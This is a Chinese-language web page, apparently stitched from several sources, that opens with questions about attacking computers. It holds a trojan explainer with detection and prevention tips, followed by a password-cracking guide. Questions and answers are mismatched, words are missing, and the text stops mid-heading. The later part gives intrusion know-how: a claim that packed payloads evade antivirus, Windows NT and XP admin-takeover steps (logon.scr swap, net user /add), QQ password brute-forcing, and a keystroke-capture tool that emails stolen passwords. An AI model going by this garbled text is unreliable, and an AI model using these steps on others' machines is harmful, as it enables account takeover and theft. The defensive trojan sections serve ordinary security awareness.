电脑攻击方式,按什么键可以攻击电脑系统

1.怎样攻破防火线进入别人的电脑？

2.电脑重置以后 每次开机都出现黑屏显示 f12 clear the TPM 和按ESC

3.黑客入侵电脑和窃取信息都是用木马吗？

4.木马是怎么利用电脑系统的漏洞来进行攻击的?

5.电脑木马的原理是什么啊？

6.电脑突然蓝屏开机就出现。ctrl+alt+del

7.电脑一键锁屏快捷键

8.找一些计算机常识题目

“木马”程序是目前比较流行的文件，与一般的不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！

是附着于程序或文件中的一段计算机代码，它可在计算机之间传播。它一边传播一边感染计算机。可损坏软件、硬件和文件。

(n.)：以自我复制为明确目的编写的代码。附着于宿主程序，然后试图在计算机之间传播。它可能损坏硬件、软件和信息。

与人体按严重性分类（从 Ebola 到普通的流感）一样，计算机也有轻重之分，轻者仅产生一些干扰，重者彻底摧毁设备。令人欣慰的是，在没有人员操作的情况下，真正的不会传播。必须通过某个人共享文件和发送电子邮件来将它一起移动。

“木马”全称是“特洛伊木马(TrojanHorse)”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员(或居心不良的马夫)在其可从网络上下载(Download)的应用程序或游戏、或网页中，包含了可以控制用户的计算机系统或通过邮件**用户信息的恶意程序，可能造成用户的系统被破坏、信息丢失甚至令系统瘫痪。

一、木马的特性

特洛伊木马属于客户/服务模式。它分为两大部分，既客户端和服务端。其原理是一台主机提供服务(服务器端)，另一台主机接受服务(客户端)，作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求，服务器上的相应程序就会自动运行，来答应客户机的请求。这个程序被称为进程。

木马一般以寻找后门、窃取密码为主。统计表明，现在木马在中所占的比例已经超过了四分之一，而在近年涌起的潮中，木马类占绝对优势，并将在未来的若干年内愈演愈烈。木马是一类特殊的，如果不小心把它当成一个软件来使用，该木马就会被“种”到电脑上，以后上网时，电脑控制权就完全交给了“黑客”，他便能通过跟踪击键输入等方式，窃取密码、号码等机密资料，而且还可以对电脑进行跟踪监视、控制、查看、修改资料等操作。

二、木马发作特性

在使用计算机的过程中如果您发现:计算机反应速度发生了明显变化，硬盘在不停地读写,鼠标不听使唤,键盘无效,自己的一些窗口在被关闭，新的窗口被莫名其妙地打开，网络传输指示灯一直在闪烁，没有运行大的程序，而系统却越来越慢，系统站用很多，或运行了某个程序没有反映(此类程序一般不大，从十几k到几百k都有)或在关闭某个程序时防火墙探测到有邮件发出……这些不正常现象表明:您的计算机中了木马。

三、木马的工作原理以及手动查杀介绍

由于大多玩家对安全问题了解不多，所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理，这样就会很容易发现“木马”。相信你看了这篇文章之后，就会成为一名查杀“木马”的高手了。(如果成不了高手建议大家用皮筋打斑竹家玻璃，嘿嘿)

“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False。ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中：将程序设为“系统服务”可以很轻松地伪装自己。

A、启动组类(就是机器启动时运行的文件组)

当然木马也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，(没有人会这么傻吧)。“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。通过win.ini和system.ini来加载木马。在Windows系统中，win.ini和system.ini这两个系统配置文件都存放在C:windows目录下，你可以直接用记事本打开。可以通过修改win.ini文件中windows节的“load=file.exe，run=file.exe”语句来达到木马自动加载的目的。此外在system.ini中的boot节，正常的情况下是“Shell=Explorer.exe”(Windows系统的图形界面命令解释器)。下面具体谈谈“木马”是怎样自动加载的。

1、在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOLTrojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

通过c:windowswininit.ini文件。很多木马程序在这里做一些小动作，这种方法往往是在文件的安装过程中被使用，程序安装完成之后文件就立即执行，与此同时安装的原文件被Windows删除干净，因此隐蔽性非常强，例如在wininit.ini中如果Rename节有如下内容:NUL=c:windowspicture.exe，该语句将c:windowspicture.exe发往NUL,这就意味着原来的文件pictrue.exe已经被删除，因此它运行起来就格外隐蔽。

2、在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell=explorer.exe程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

win.ini、system.ini文件可以通过“开始”菜单里的“运行”来查看。只要在“运行”对话框中输入“msconfig”,后点击“确定”按钮就行了。(这里大家一定要注意，如果你对计算机不是很了解，请不要输入此命令或删除里边的文件，否则一切后果和损失自己负责。斑竹和本人不承担任何责任。)

3、对于下面所列的文件也要勤加检查，木马们也可能隐藏在

C：\windows\winstart.bat和C:\windows\winnint.ini，还有Autoexec.bat

B、注册表(注册表就是注册表，懂电脑的人一看就知道了)

1、从菜单中加载。如果自动加载的文件是直接通过在Windows菜单上自定义添加的，一般都会放在主菜单的“开始->程序->启动”处，在Win98管理器里的位置是“C:windowsstartmenuprograms启动”处。通过这种方式使文件自动加载时，一般都会将其存放在注册表中下述4个位置上：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserS!hellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\UserShellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellFolders

2、在注册表中的情况最复杂，在点击至：“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“AcidBatteryv1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer键值改为Explorer=“C:\WINDOWS\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

3、此外在注册表中的HKEY_CLASSES_ROOT\exefile\shell\open\command=

“1”“*”处，如果其中的“1”被修改为木马，那么每次启动一个该可执行文件时木马就会启动一次，例如著名的冰河木马就是将TXT文件的Notepad.exe改成!了它自己的启动文件，每次打开记事本时就会自动启动冰河木马，做得非常隐蔽。

注册表可以通过在“运行”对话框中输入“regedit”来查看。需要说明的是，对系统注册表进行删除修改操作前一定要将注册表备份，因为对注册表操作有一定的危险性，加上木马的隐藏较隐蔽，可能会有一些误操作，如果发现错误，可以将备份的注册表文件导入到系统中进行恢复。(次命令同样很危险，如不懂计算机请不要尝试。切记)

C、端口(端口，其实就是网络数据通过操作系统进入计算机的入口)

1、万变不离其宗，木马启动都有一个方式，它只是在一个特定的情况下启动。所以平常多注意你的端口。一般的木马默认端口有

BO31337，YAL1999，Deep2140，Throat3150，冰河7636，Sub71243

那么如何查看本机开放哪些端口呢？

在dos里输入以下命令：netstat-an,就能看到自己的端口了，一般网络常用端口有：21,23,25,53,80,110,139，如果你的端口还有其他的，你可要注意了，因为现在有许多木马可以自己设定端口。(上面这些木马的端口是以前的，由于时间和安全的关系现在好多新木马的端口我不知道，也不敢去试，因为技术更新的太快了，我跟不上了。55555555555555)

2、由于木马的运行常通过网络的连接来实现的，因此如果发现可疑的网络连接就可以推测木马的存在，最简单的办法是利用Windows自带的Netstat命令来查看。一般情况下，如果没有进行任何上网操作，在MS-DOS窗口中用Netstat命令将看不到什么信息，此时可以使用“netstat-a”,“-a”选项用以显示计算机中目前所有处于监听状态的端口。如果出现不明端口处于监听状态，而目前又没有进行任何网络服务的操作，那么在监听该端口的很可能是木马。

3、系统进程：

在Win2000/XP中按下“CTL+ALT+DEL”，进入任务管理器，就可看到系统正在运行的全部进程，一一清查即可发现木马的活动进程。

在Win98下，查找进程的方法不那么方便，但有一些查找进程的工具可供使用。通过查看系统进程这种方法来检测木马非常简便易行，但是对系统必须熟悉，因为Windows系统在运行时本身就有一些我们不是很熟悉的进程在运行着，因此这个时候一定要小心操作，木马还是可以通过这种方法被检测出来的。

四、软件查杀木马介绍

上面所介绍的都是以手工方式来检测或者清除木马，但一般情况下木马没有那么容易就能发现，木马是很会隐藏的哦。幸好在已经有了不少的反木马软件。下面介绍几款软件，

1、瑞星杀毒软件。

2、个人版天网防火墙。根据反弹式木马的原理，就算你中了别人的木马，但由于防火墙把你的计算机和外界隔开，木马的客户端也连接不上你。防火墙启动之后，一旦有可疑的网络连接或者木马对电脑进行控制，防火墙就会报警，同时显示出对方的IP地址、接入端口等提示信息，通过手工设置之后即可使对方无法进行攻击。不过对于一些个别机器来说，运行天网会影响机器的运行速度。

3、木马克星。目前具我所知，是只查杀木马的软件，也是能查杀木马种类最多的软件。顾名思义，木马克星不克乾坤无敌槌也不克北冥槌法，专克各种木马。但也不是绝对哦，好象“灰鸽子”能屏蔽掉木马克星。(听说而已没试过哦。“灰鸽子”也是一种木马，和冰河差不多。)(现在木马克星大多是没注册的版本。用木马克星查木马时，要是提示你发现木马只有注册用户才能清除，这只是作者的一个小手段，其实他的意思是如果发现木马，那么只有注册用户才能清楚，要是真的发现了木马，软件会告诉你木马的具体位置和名字是什么。我们用其他的软件和手段清除不就行了)

4。绿鹰PC万能精灵。他会实时监控你的计算机，看着“系统安全”心理舒服多了。

有了类似的这些防护软件，你的计算机基本上是安全了。但道高一尺，魔高一丈。最近又出现了一种可以把木马伪装易容的程序(不知道是哪个高手搞的，很是厉害)，就是把木马本体根据排列组合生成多个木马，而杀毒软件只能查杀他们的母体。而后生成的木马就不能查到了，所以手动人工的清除木马我们还是要掌握一些地。

软件查杀其他很有效，对木马的检查也是蛮成功地，但彻底地清除不很理想，因为一般情况下木马在电脑每次启动时都会自动加载，而杀软件却不能完全清除木马文件，总的说来，杀软件作为防止木马的入侵来说更有效。

五、木马的防御

随着网络的普及和网络游戏装备可以换人民币的浪潮，木马的传播越来越快，而且新的变种层出不穷，我们在检测清除它的同时，更要注意取措施来预防它，下面列举几种预防木马的方法。(大家的意见，我借用而已)

1、不要下载、接收、执行任何来历不明的软件或文件

很多木马都是通过绑定在其他的软件或文件中来实现传播的，一旦运行了这个被绑定的软件或文件就会被感染，因此在下载的时候需要特别注意，一般推荐去一些信誉比较高的站点。在软件安装之前一定要用反软件检查一下，建议用专门查杀木马的软件来进行检查，确定无毒和后再使用。

2、不要随意打开邮件的附件，也不要点击邮件中的可疑。(后边另外介绍一个关于邮件的例子，大家注意收看。)

3、将管理器配置成始终显示扩展名。将Windows管理器配置成始终显示扩展名，一些文件扩展名为vbs、shs、pif的文件多为木马的特征文件，如果碰到这些可疑的文件扩展名时就应该引起注意。

4、尽量少用共享文件夹。如果因工作等原因必须将电脑设置成共享，则最好单独开一个共享文!件夹，把所有需共享的文件都放在这个共享文件夹中，注意千万不要将系统目录设置成共享。

5、运行反木马实时监控程序。木马防范重要的一点就是在上网时最好运行反木马实时监控程序，PC万用精灵等软件一般都能实时显示当前所有运行程序并有详细的描述信息。此外如加上一些专业的最新杀毒软件、个人防火墙等进行监控基本就可以放心了。

6、经常升级系统。很多木马都是通过系统漏洞来进行攻击的，微软公司发现这些漏洞之后都会在第一时间内发布补丁，很多时候打过补丁之后的系统本身就是一种最好的木马防范办法。

六、木马传播的个别范例(给大家介绍一个邮件类的)

1、来自网络的攻击手段越来越多了，一些带木马的恶意网页会利用软件或系统操作平台等的安全漏洞，通过执行嵌入在网页HTML超文本标记语言内的JaApplet小应用程序、jascript脚本语言程序、ActiveX软件部件交互技术支持可自动执行的代码程序，强行修改用户操作系统的注册表及系统实用配置程序，从而达到非法控制系统、破坏数据、格式化硬盘、感染木马程序、**用户数据资料等目的。

目前来自网页的攻击分为两种：一种是通过编辑的脚本程序修改IE浏览器；另外一种是直接破坏Windows系统。前者一般会修改IE浏览器的标题栏、默认主页或直接将木马“种”在你的机器里等等；后者是直接锁定你的键盘、鼠标等输入设备然后对系统进行破坏。

(作者插言)：还好目前**千年用户名和密码的“木马”功能还仅仅是偷盗行为，没有发展成破坏行为。要不然号被盗了，在顺便把硬盘被格式化了。那样想第一时间找回密码就都没可能。希望这种情况不要发生。(啊门我弥佗佛)

下边是正题了，大家看仔细了！

如您收到的邮件附件中有一个看起来是这样的文件(或者貌似这类文件，总之是特别诱人的文件，而且格式还很安全。)：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。

{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：

您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始通过网页加载木马文件。同时显示“正在打开文件”之类的这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？

欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。

在某些恶意网页木马中还会调用“WScript”。

WScript全称WindowsScriptingHost，它是Win98新加进的功能,是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:\WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在WindowsScriptingHost脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

最近听不少玩家反映，许多马夫通过冒充千年官方网站的办法给玩家发名字类似“您的千年密码确认函”、“您的千年资料保护建议”等的邮件，来骗取玩家的信任，来点击运行该木马邮件。希望广大玩家在点击这类邮件时一定要看清邮件是否来自于千年官方网站。如是来自其他什么网站或个人邮箱的，马上删除，记得一定要马上删除，别抱任何侥幸心理。

七、关于“木马”的防御(纯属个人意见，不付法律责任)

防止木马对在家上网来说是很简单的事，无非就是装一大堆杀毒软件，并及时升级。(再新的木马只要传播速度快的话很快就会成为各种杀毒软件的战利品，除非此人专门定做个人木马)在加上天网防火墙(很多黑客就是利用口令和漏洞进行远程控制，该防火墙可以防止口令和漏洞入侵)基本上就可以解决问题啦，除非是自己好奇或是不小心打开了木马服务端，我想这种情况还是占一定的比例！

但是对网吧上网的来说，再好的防御也是白撤。

据我所知，现在的网吧安全系数几乎等于00000000，现在最厉害的应该就是装个还“原精灵吧”，但是......我个人认为那东西用处不是很大，说是保护用户密码还不如说它是网吧保护系统的一种软件。现在的木马一般都是通过邮件方式传送密码的，也就是说，你只要在输入框内输入你的密码之后，木马控制方就已经得到你的ID和密码了(一般不会超过三分钟)！对网吧上网的朋友来说，靠复制方法输入ID和密码算最安全的了，很多木马程序实际上就是一个键盘记录工具，在你不知情的情况下把你的键盘输入情况全部记录了下来，然后通过网络发送出去！(好可怕哦，不过具我所知现在公安部和文化部已经明令禁止网吧安装还原精灵了，说是为了保留历史记录云云。唉~~就这么点防御手段也给封杀了，哭哦)

总之，家庭上网用户记得随时更新自己的库，随时检查计算机进程，发现不明进程马上格杀，不浏览一些不明站点(我通常是靠域名来分析站点的可靠程度，一般一级域名都不会出现恶意代码和网页木马)，更别随意接收别人给你发送的文件和邮件！

网吧防盗真的很困难了，什么人都有，复杂了，就算老板花钱去注册一个木马克星，呵呵。。。都没用，想做坏事的人同样能把他干掉~~~~我个人认为，网吧上网除了复制ID密码粘贴到输入框，其他的就得听天由命了~~~~~

八、关于大家都用的醉翁巷1.1G的说明

用了人家的软件，就总要替人家说句公道话。前些时候，有人说醉翁1.1G软件运行后，没什么反映。当关闭软件的一刹那，一些防护类软件提示：此软件正在监视本机键盘！！

其实就是醉翁巷中的hook.dll文件在作怪。下面给大家说说“勾子”的我问题。

什么是勾子

在Windows系统中，勾子(hook)是一种特殊的消息处理机制。勾子可以监视系统或进程中的各种消息，截获发往目标窗口的消息并进行处理。这样，我们就可以在系统中安装自定义的勾子，监视系统定的发生，完成特定的功能，比如截获键盘、鼠标的输入，屏幕取词，日志监视等等。可见，利用勾子可以实现许多特殊而有用的功能。因此，对于高级编程人员来说，掌握勾子的编程方法是很有必要的。

勾子的类型

按使用范围分类，主要有线程勾子和系统勾子

(1)线程勾子监视指定线程的消息。

(2)系统勾子监视系统中的所有线程的消息。因为系统勾子会影响系统中所有的应用程序，所以勾子函数必须放在独立的动态链接库(DLL)中。这是系统勾子和线程勾子很大的不同之处。

醉翁巷中的hook.dll就是完成以上功能的程序，由于勾子对程序的特殊性，所以会有部分软件报告发现他在记录键盘动作，不过不会报告说他是木马。(呵呵搞的确实挺吓人的。不过就算它记录键盘动作，只要不发送就没太大危险了)

九、大总结(就是对上边的大总结啦)

大家知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最安全也是最有效的方法就是马上将计算机与网络断开，防止黑客通过网络对你进行攻击。然后在根据实际情况进行处理。

下面给大家说一下我机器的防护装备：(一共就5样)

XFILTER个人防火墙：这个防火墙没什么防的功能，它只监视所有未经过我个人许可的程序连接网络。任何程序连接网络它都会通告并询问。比如安装完该软件“第一次”运行千年，它会提示你C:\ProgramFiles\1000y\Client.exe要连接网络，是否放行。它就是这样来防范的。

瑞星杀毒软件：以杀各种恶意和木马为主，2004版专门提供游戏保护。

还原精灵：记录当前硬盘和系统信息。不管以后对硬盘和系统进行什么操作都能还原成初始模样。比如我们2003年11月1日对当前C硬盘和系统进行备份保存，2003年12月1日由于感染木马，对系统进行还原，还原后所有东西都会回到2003年11月1日备份是的样子。不论你在C盘上进行了什么操作，都会变回备份时的样子。这个软件就有一个缺点，会影响机器的启动速度。但不影响机器的运行。最近还有朋友反映新版本和某些游戏有冲突。

木马克星：这个我就不多说了，网络游戏玩家必备的东东。

十六进制编译器：具体名字我就不说了，有兴趣的朋友随便找一个用就行了。主要是对一些可疑程序进行扫描和检测。

以上各个软件在各大门户网站和各大下载专业网站都可以找到，在这里小女子就不提供网址了，避免不必要的麻烦。

怎样攻破防火线进入别人的电脑？

可以尝试使用window键+R组合键打开运行框或者点击电脑最左下角的win界面键，查看运行，输入“msconfig”回车进入系统配置

打开的系统配置中，找到“引导”选项，在“安全引导”的选项前打上勾就好了，然后点击底部的“确定”保存

设置完以上之后，我们重启电脑在未完全启动之前点击键盘上的方向键，就可以进入安全模式。如果要退出安全模式的话，按如上步骤，把安全引导的勾给取消就可以了

电脑重置以后 每次开机都出现黑屏显示 f12 clear the TPM 和按ESC

攻破防火线进入别人的电脑：字典爆破，溢出，将加壳进去后解壳，这种连杀毒软件都发现不了。

用电脑密码破解技巧·CMOS密码破解

网管员在维护和使用电脑时，经常会遇到各种密码丢失的问题，这里，我们就为广大网管员准备了一些破解密码的方法，但是希望大家不要干坏事哦。开机密码是我们最先要遇到的因此我们就先从CMOS密码破解讲起。虽然CMOS种类各异，但它们的加密方法却基本一致。一般破解的方法主要从“硬”和“软”两个方面来进行。

一、CMOS密码破解

使用电脑，首先需要开机。因此开机密码是我们最先要遇到的。虽然CMOS种类各异，但它们的加密方法却基本一致。一般破解的方法主要从“硬”和“软”两个方面来进行。

1.“硬”解除方法

硬件方法解除CMOS密码原理是将主板上的CMOSRAM进行放电处理，使存储在CMOSRAM中的参数得不到正常的供电导致内容丢失，从而起到解除CMOS密码的目的。一些报刊对如何破解CMOS密码的通常做法，如跳线短接法和电池短接法已有较多介绍，操作起来也十分方便。但我们这里要介绍的是个另类技巧，这也是一些电脑DIY们很喜欢用的方法。方法也很简单：打开机箱，将硬盘或光驱、软驱的数据线从主板上拔掉，然后再启动计算机，BIOS会在自检时报告错误并自动进入CMOS，此时就可以重新设置BIOS内容了。

2.“软”解除方法

严格地说，“软”解除CMOS密码没有“硬”解除方法那么彻底，但也十分奏效。CMOS密码根据需要，可设为普通级用户密码和超级用户级密码两种。前者只是限制对BIOS的修改，可以正常启动电脑和运行各类软件，而后者则对进入电脑和BIOS完全禁止。

1） 破解普通用户密码

首先用DOS启动盘启动电脑，进入DOS状态，在DOS命令行输入debug回车，然后用所列的其中任何一种方法的数据解除CMOS密码，重新启动电脑，系统会告诉你CMOS参数丢失，要求你重新设定CMOS参数。经过试验，这是一种很有效的方法。“-”后面的字母“O”，表示数值输出的地址，70和10都是数值。

2） 破解超级用户密码

这里我们需借助外部工具。我们选用最为经典的BiosPwds，是一款免费软件，比较适合对DOS不太熟悉的电脑用户，很久以前就为人们所熟知，只要轻轻一点，就会将用户的CMOS密码显示出来。工具最新版本1.21，127KB，地址：：//bj2.onlinedown.net/soft/8107.htm。下载解压后，双击该软件的执行文件，在出现的界面中点击“Getpasswords”按钮，稍等二、三秒即会将BIOS各项信息显示于BiosPwds的界面上，包括：Bios版本、Bios日期、使用密码等，这时你便可以很轻松地得知BIOS密码。

·破解系统密码

二、破解系统密码

系统密码是你登录到操作系统时所使用到的密码，它为你的计算机提供了一种安全保护，可以使你的计算机免受非法用户的使用，从而保障电脑和机密数据的安全。

1. Windows98/ME的系统登录密码

① 取消法

最简单的一种方法是在系统登录要求输入密码时，你什么也不用输入，直接点击取消，可以进入操作系统。但用此种方法只能访问本机的，如果计算机是局域网的一部分，你将不能访问网络。

② 新增使用者

当你由于密码问题被挡在系统之外时，不妨为系统再新增一个使用者，然后重新登录，一样可以登录系统并访问系统或网络。单击“开始”/“设置”/“控制面板”，然后双击“用户”，打开“用户属性”对话框。接着，根据提示依次输入“用户名”、“密码”、“个性化项目设置”中所需的内容，最后单击“完成”。

③ 删除"PWL"文件

删除Windows安装目录下的 .PWL密码文件和Profiles子目录下的所有个人信息文件，然后重新启动Windows，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击"确定"按钮，Windows密码即被删除。

④ 修改注册表

运行注册表编辑器，打开注册表数据库"HKEY＿LOCAL＿MACHINE＼Network＼Logon"分支下的"username"修改为"0"，然后重新启动系统，也可达到去掉密码的目的。

2. 破解WindowsNT密码

如果你有普通用户账号，有一个很简单的方法获取NTAdministrator账号：先把c：＼winntsystem32下的logon.scr改名为logon.old备份，然后把usrm gr.exe改名为logon.scr再重新启动。logon.scr是系统启动时加载的程序，重新启动后，不会出现以往的登录密码输入界面，而是用户管理器，这时你就有权限把自己加到Administrator组。

3. Windows2000密码

启动盘启动电脑或引导进入另一操作系统（如Windows98），找到文件夹"X：＼DocumentsandSettings＼Administrator"（X为Windows2000所在磁盘的盘符），将此文件夹下的"Cookies"文件夹删除，然后重新启动电脑，即可以空密码快速登录Windows2000。

4. 破解WindowsXP的密码

在启动WindowsXP时按F8键选择带命令行的安全模式，使用net命令可以对用户身份进行操作。具体步骤如下：使用命令"netuserabcd/add"添加一名为abcd的用户，使用命令"netlocalgroupadministratorsabcd/add"将用户abcd提升为管理员，重新启动电脑，用abcd身份登录，最后对遗忘密码的用户进行密码修改即可。

·破解常用软件密码

三、破解几个常用软件密码

目前，更多的用户懂得了利用电脑软件对自己的一些储存在电脑中的信息进行加密操作，使无权阅读的人无法轻松打开这些重要资料。下面就让我们一块看一下几个常用软件密码的解除：

1. 破解WPS系列密码

如果你是合法用户，在忘却密码时，启动WPS程序，点击“文件”/“密码设置”菜单，在出现的密码设置对话框中可以看到原密码会自动以“ ”号的方式出现在“密码”文本框中，点击“清除”按钮，再在随后出现的提示框中点击“确认”按钮，该加密文件的密码已经被清除了。以后再次打开该文件就不再需要输入密码了。如果你不是合法用户就只能借助有关工具进行破解。现在破解WPS密码的软件很多，但论其功能强大，破解速度快就要数国产的Edward’sWPS2000PasswordRecovery了。该工具破解WPS密码用的是破解密码的常见的方法———穷举法。使用步骤如下：首先，在程序界面中的“En cryptedWPS2000file”的文本框中通过右侧的“浏览”按钮加入需破解的WPS加密文件；然后选择密码破解方法，该软件有以下几种密码破解方式：Brute-force（强力攻击）、Dictionary（字典攻击）、mask（掩码搜索）等等，一般选用“Brute-force”（强力破解）法；接着在“Brute—forceRangeOptions”列表框中选择破解密码可能包含的密码范围，例如：大小写字母、数字、是否有空格、特殊字符等；此外还要指定密码长度，如6位或更长；最后，当上述几项设置完毕后，请点击"RUN"选项，密码很快得以破解。

2. 破解Word文档密码

可能是微软的Office太引人注目了，针对它的破解软件非常多。下面先让我们来看看如何破解它的文档密码。我们选用一款国产的软件“/2000/XP密码查看器”，这是一款仅有29KB大小的微型简体中文的Word密码解除软件。此软件无需安装，双击可执行文件即可。该工具可以破解Win dows9X/NT/2000/XP全系列的文档密码，可以查找最多13位的密码（未注册版只支持3位），使用“字典式”穷举法破解。使用时在程序中点击“文件”/“打开”命令加入需破解文档；在“任务属性”中设置密码类型，建议将几个选项全部选中；填写密码长度；点击“确定”返回主界面，选择"操作"/"开始破解命令即可进行密码破解。

3. 破解Excel文档

我们选用一个叫AdvancedExcelPasswordRecovery的工具，614K，最近版本1.01，它可以迅速破解Ex cel文件的密码。Ad vancedExcelPasswordRecovery下载后需要安装，安装完毕后打开其程序主界面，通过浏览按钮打开需要解密的电子表格文档，选择密码长度，设置密码类型，最后点击蓝色的开始破解按钮，稍等片刻会弹出文档密码已被破解的提示菜单。

4.破解QQ密码

我们使用一个叫“OICQ密码终结者”的工具。使用步骤如下：首先要设置你的OICQ的安装目录；接着选择搜索用的字符集，例如选上图中小写字母的字符集，就选中小写字母前的复选框或将"基本设置"下面的所有方框全部选中；然后设置搜索密码的位数，建议不要太长，例如8位，那就需要很长时间，不知你有没有耐心；最后单击"开始"按钮即可进行OICQ的密码破解。据网上高手称Oicqpassovcr的穷举速度可以达到每秒钟数千次，如果你想破解的QQ密码只是4-5位的话，我想在几分钟之内Oicqpassover就可以破解密码了。

·破解网络密码

四、破解网络密码

网络正悄然而迅速地走进我们的日常生活。但作为普通的网络用户，人们都有一种共同的忧虑，就是网络的安全隐患。于是不得不对个人网络活动取有效的保护措施——加上各种密码。但这些密码一旦遗忘，成为我们进行工作的大碍。下面是一些有关网络密码的破解技巧。

1. 破解上网账号与密码

作为日常上网的桥梁，我们每个人都需要在上网时进行上网账号与密码的设置，这样才能登录网络。利用一些工具软件获得账号并不是很难的事情，甚至可以说是一件轻而易举的事情。这里我们借助一个叫GetIP的工具，这是个由国人刘骥设计开发的“口令密码”识别软件。GetIP能够帮助我们将那些代表口令的密码“***”号还原成真实的口令。如果你需要该软件，可到作者的主页：//brain.zb169.net/。GetIP使用十分简单，运行GetIP.exe可执行文件，出现程序界面，将鼠标指向“点击（放大镜）处并拖动”，用鼠标拖着移动到想要得知的密码处，真实的密码口令就会立即反应到"文本"框中。

2. 破解IE分级审查密码

IE浏览器提供了分级审查功能，它可以在用户的设置下对某些网页进行过滤，只有知道分级审查功能密码的用户才能查看相关网页的信息。如果遗忘了分级审查功能的密码，不但不能访问受到限制的站点，而且不能更改已有的别，重装IE也没有用，怎么办？启动注册表编辑器，找到“HKEY＿LOCAL＿MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼policies＼Ratings”子键，找到一个名叫"KEY"的键值项，它就是用户设置IE分级审查口令（数据已经加密），用户只需删除该键值就可以取消分级审查口令，然后重新设置IE分级审查密码即可。

3. 破解OE密码

在OE程序中有三种密码：邮箱密码、新闻组密码和用户身份确认密码。下面我们以一个叫“密码截取”（3.1特别版）的软件，可运行于WIN9X/2000/NT/XP，110KB，可到：//gaoasp.diy.163/处下载。软件可以用于破解Web的邮箱密码、POP3收信密码、FTP登录密码，并将密码显示、保存，或发送到用户指定的邮箱。密码截取过程：密码截取软件将截取到的密码输入框中的密码（如拨号连接、OICQ、IE中的密码），以密码明文形式保存在用户自定义的文件中（缺省为c：＼password.txt），如果没有截取到密码，密码文件将不存在。同时可以将获取到的密码发送到用户指定的邮箱中。密码截取2.8支持的操作系统：Windows9X/NT/2000。该软件不需安装，下载并解压后，直接双击getpassword.exe运行，点击图中的"邮件设置"选项，设置将截取到的密码发向指定信箱，接着点击"密码文件"选项，设置将截取到的密码保存在本机的c：＼password.txt中，以便随时查看。

4. 破解Foxmail密码

